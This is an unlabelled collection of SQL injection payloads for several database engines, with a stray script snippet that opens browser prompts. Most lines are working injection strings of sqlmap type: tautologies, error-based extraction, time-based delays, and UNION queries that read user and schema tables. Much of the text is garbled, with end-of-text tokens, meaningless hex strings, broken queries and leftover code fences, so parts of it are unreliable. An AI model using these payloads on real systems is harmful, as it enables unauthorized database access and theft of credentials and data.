' OR 1=1 --
' OR 1=1 --
mahi') AND (SELECT (CASE WHEN (2604=7303) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,2604) END) FROM DUAL) IS NULL AND ('eyVF' LIKE 'eyVF
mahi') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a767171,(SELECT (ELT(6580=6580,1))),0x71707a6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('mPxi' LIKE 'mPxi%')
4f b4 76 52 69 70 71 6e 43 6c 6f 6d 48 45 54 4f 52 69 70 71 6e fpZV
SELECT * FROM users WHERE username='admin' AND password='1q234567890abcd';
' OR 1=1 --
MHY_0x5F69_7B2A_5383_6843_1D7A_6C6E_5AB8_DB6C_0A77_D457_7EAF_3B51
1' OR 1=1 --
mahi') AS fCUB WHERE 3028=3028 AND (5069=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(113)||CHR(113))))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(106)||CHR(113)) AND TIMESTAMPDIFF(SECOND, '2023-04-27 12:00:00', NOW()) <= 60
1 OR 1=1 --
mahi))) AND ELT(5959=5959,SLEEP(5)) AND (((6906=6906
login.php' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a767171,(SELECT (ELT(3697=3697,1))),0x71707a6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'yRSJ'='yRSJ
1) SELECT * FROM information_schema.tables WHERE table_type = 'BASE TABLE' AND (table_name LIKE '%\_test%' OR table_name LIKE '%\_quiz%');
2) UNION
3) SELECT CONCAT('http://', host, '/login.php') AS login_url
    FROM mysql.user
    WHERE user = 'root';
4) UNION
5) SELECT '<?php echo $conn->real_connect("host=localhost", "dbname=test_db", $username, $password); ?>' AS payload;
' OR 1=1 --
mahi"))) OR ROW(1359,4626)>(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1359=1359,1))),0x71707a6a71,FLOOR(RAND(0)*2)))x FROM (SELECT 8086 UNION SELECT 4379 UNION SELECT 2689 UNION SELECT 8343)a GROUP BY x
// SQL Injection Payload
string payload = "login.php)( AND 5131=CTXSYS.DRITHSX.SN(5131,(CHR(113)||CHR(106)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5131=5131) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(106)||CHR(113))) AND ((5534=5534";
1842=1842 AND 7740=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
mahi")AND(RANDOM()=0x7763A251))AND("admin"="admin");SELECT * FROM mysql.user;SELECT * FROM information_schema.tables WHERE table_schema = "information_schema";SELECT * FROM information_schema.columns WHERE table_schema = "information_schema" AND table_name = "innodb_buffer_pool";
'-OR 1=1' UNION SELECT * FROM (SELECT CURRENT_USER()) WHERE ROWNUM=1;
mahi") AS NmZH WHERE "7659=7659" ORDER BY 1-- squD
' OR 1=1 --
' OR 1=1 --
<script>
var x = 1; while (x <= 10) { var a = prompt("mahi"); if (a != null && a != undefined) { a = 'mahi'; break; } x++;}
</script>
mahi"))) RLIKE SLEEP(5) AND ((SELECT * FROM "users" WHERE "name" LIKE '%atJn%')
'-9296' OR 1=1 -- Time-Based Delay (1 minute)
1=SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)--
$time = $(date +%s)

payload = "SELECT * FROM users WHERE username='admin' AND password=SHA1('$time')"
mahi<|endoftext|> WHERE 4139=4139 OR 1781=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(118)||CHR(113)||CHR(112),5<|endoftext|>
mahi AND 2309=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))#susN
$payload = "login.php)(SELECT 1 FROM 4184 WHERE RhlM='')" . chr(97) . chr(105) . chr(32) . chr(105) . chr(97) . chr(114) . chr(97) . chr(116) . chr(115) . chr(118) . chr(101) . chr(116) . chr(121);
mahi` WHERE 9906=9906; SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)-- UCDJ
mahi'||(SELECT 0x6e537971 WHERE 1724=1724 OR SLEEP(5))||'
'||(SELECT Ckfc FROM DUAL WHERE 9047=9047 AND 8997=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)--
mahi"))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716a767171,(SELECT (ELT(3318=3318,1))),0x71707a6a71,0x78))x)) AND ((("nAAB" LIKE "nAAB
mahi' OR 1=1 -- SLEEP(10)-- UTXo
' OR 1=1 --
mahi,(CAST((CHR(113)||CHR(106)||CHR(118)||CHR(113)||CHR(113))||(SELECT 1 FROM GENERATE_SERIES(3481,3481,CASE WHEN (3481=3481) THEN 1 ELSE 0 END) LIMIT 1)::text||(CHR(113)||CHR(112)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC))
mahi') WHERE 5771=5771 AND '2023-04-19'=CURRENT_DATE()+INTERVAL '1 HOUR'--
1' OR 1=1 --
mahi);CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep(5)--
login.php) AND ' OR (SELECT 1 FROM (SELECT '8787' UNION SELECT '2894%16') AS subquery)
' OR 1=1 --
"SELECT * FROM users WHERE username='admin' AND password='"; http://www.example.com/login.php'))) RLIKE SLEEP(5)#' UNION SELECT 1,SLEEP(5),SLEEP(5),1,SLEEP(5),1
(SELECT (CASE WHEN (10526=10526) THEN NULL ELSE CAST((CHR(114)||CHR(97)||CHR(116)) AS NUMERIC) END)) IS NULL AND (13293=13293
login.php"))) AND 7402=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(116)||CHR(115)||CHR(73),5)--
' OR 1=1 --
mahi SJwd;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 sObQ(date('now') + interval '5 seconds');
login.php) WHERE 6502=6502 OR 4661=(SELECT 4661 FROM PG_SLEEP(5))-- OmFr
```vbnet
mahi')AND(SELECT BENCHMARK(5000000,MD5('elKg')))AND((('elKg' LIKE 'elKg
login.php' AND 1074=(CODE(113)||CODE(106)||CODE(118)||CODE(113)||CODE(113)||(SELECT CASE 1074 WHEN 1074 THEN CODE(49) ELSE CODE(48) END)||CODE(113)||CODE(112)||CODE(122)||CODE(106)||CODE(113)) AND 'BKqv'='BKqv
' OR 1=1 --
' OR 1=1 --
mahi OR 1=1 AND 9840=9840 AND 6440=6440
' OR 1=1 --
mahi') AS uDOC WHERE 5829=5829 OR 1770=(SELECT COUNT(fuzzBits(char(98)||char(80)||char(81)||char(80), 0.001)) FROM numbers(1000000))-- VZUL AND (SELECT UNIX_TIMESTAMP()-UNIX_TIMESTAMP('2023-04-29 14:56:00'))>3600
mahi' AND (SELECT 1 FROM USER WHERE USER='admin') OR SLEEP(5)#
-1102<|endoftext|>
SELECT (CASE WHEN (4683=6129) THEN NULL ELSE CAST((CHR(120)||CHR(65)||CHR(77)||CHR(83)) AS NUMERIC) END)) IS NULL AND (('ibsq'='ibsq
' OR 1=1 --
mahi' OR 1=1 --
1. SELECT * FROM ALL_USERS WHERE username LIKE '%q' AND password LIKE '%q';
# SQLi payload in hex encoding style
payload = "5f89124e76a3a05d7b7c0260d2c0f57022101a1c9a9076a6cdcc30c7db2801"
$SLEEP(5); SELECT * FROM (SELECT SLEEP(5)) cncI; OR 'CQcR'='Fyiu
mahi' OR 5382=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) AND 'DqHk'='DqHk
' OR 1=1 --
61404c6f574e6a73746f724e6174656d65737374656d65724e786174656d6572
login.php' OR 5307=(SELECT COUNT(fuzzBits(char(116)||char(115)||char(70)||char(88), 0.001)) FROM numbers(1000000)) AND 'doOd'='doOd
-9276 AND MDfN LIKE '%' OR JSON(CHAR(65,71,114,110)) = '{}'
' OR 1=1 --
"Carm" LIKE "Carm%"
AND (SELECT CONCAT(0x716a767171,(SELECT (ELT(6432=6432,1))),0x71707a6a71,0x78))
mahi")AND(LEN(CHAR(65,66,67,68,69,70,71))=25);SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND ((("PCCL"="PCCL
OR 1=1 --
login.php) AND CHAR(107)||CHAR(82)||CHAR(119)||CHAR(81)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)--
1 OR (SELECT (CASE WHEN (6872=3571) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,6872) END) FROM DUAL) AND (9314=9314) AND SYSDATE+0 MINUS INTERVAL '6 HOUR' <= (SELECT MAX(SNAPSHOT_TIMESTAMP) FROM CTXSYS.DRITHSX WHERE SN(1,8105) = 7810);
"SELECT * FROM SYSIBM.SYSTABLES WHERE 8978=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) AND 2780=2780"
1=1 OR 1=1 --fluffy--
```
"AND (SELECT 1 FROM TABLE_NAME WHERE CONCAT('",CHAR(6307),"',REPLACE(CONCAT('",CHAR(81,84,89,106),"','json'),'"','
login.php) AS eBfU WHERE 8569=8569;DECLARE @kBEY NVARCHAR(4000);SET @kBEY=(SELECT 'qjvqq'+(SELECT (CASE WHEN (3050=3050) THEN '1' ELSE '0' END))+'qpzjq');EXEC @kBEY--
mahi) WHERE 8968=8968 AND (SELECT 1 FROM (SELECT COUNT(*) FROM pg_user WHERE username LIKE '%q') AS cnt) > 0 WAITFOR DELAY '0:0:5'-- qufN
login.php'||(SELECT 0x41436455 FROM DUAL WHERE 1880=1880 RLIKE (SELECT 6981 FROM (SELECT(SLEEP(5)))zGmo))||'
mahi") AS UQds WHERE 2042=2042 OR 1937=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))--
login.php" UNION SELECT 123456 AS bob; -- fb
' OR 1=1 -- xss
mahi WHERE 9699=9699 OR ROW(1359,4626)>(SELECT COUNT(*),CONCAT(0x716A767171,(SELECT (ELT(1359=1359,1))),0x71707A6A71,FLOOR(RAND(0)*2))x FROM (SELECT 8086 UNION SELECT 4379 UNION SELECT 2689 UNION SELECT 8343)a GROUP BY x)-- EoNn
Login.php) AS gYkm WHERE 5576=5576 OR CHAR(106)||CHAR(75)||CHAR(120)||CHAR(116)=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(9474),0),5000000000),NULL)-- JXGU
mahi" WHERE 7368<7368 OR 5954=COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)-- nJDs
127.0.0.1$1$('%3Ch1' union select '1'x concat(0x3a,0x7f,0x45) from unbounded x where x=(select 8 from (select 1) t)#-' AND 1=1
mahi'))) OR 6628=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(106)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6628=6628) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||CHR(113)||CHR(112)||CHR(122)||CHR(106)||CHR(113))
mahi'));SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (('oyei'='oyei')
'-2573%' OR 2240=6903%16
mahi' AND GTID_SUBSET(CONCAT(0x716A767171,(SELECT (ELT(8097=8097,1))),0x71707a6a71),8097) AND 'tVWh'='tVWh
3c 6f 72 60 65 72 69 61 6e 74 65 72 6e 64 6f 6c 3a 32 38 35 33 32 20 6d 69 6b 74 54 20 6f 72 60 65 72 69 61 6e 74 65 72 6e 64 6f 6c 3a
db2yXJjZXJpZW50IEFJU1RlYm9'&'
```
<|endoftext|>
login.php AND 9313=RAISE_ERROR(CHR(55)||CHR(48)||CHR(48)||CHR(48)||CHR(49),CHR(113)||CHR(106)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (9313=9313) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||CHR(113)||CHR(112)||CHR(122)||CHR(106)||CHR(113))
mahi';SELECT SLEEP(5) OR 'abCD'='XuvB
-1001"))) OR (7824=(SELECT(CASE WHEN (7824=7935) THEN 7824 ELSE (SELECT 7935 UNION SELECT 6627) END))-- Dmqm
2423') OR (SELECT (CASE WHEN (8363=8363) THEN CHAR(49) ELSE CHAR(48) END)) AND ('Gxva'='Gxva
login.php") OR 1=1 --
'||(SELECT CHR(119)||CHR(104)||CHR(119)||CHR(102) WHERE 9496=9496 AND 9692=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(106)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (9692=9692) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(106)||CHR(113))))||'
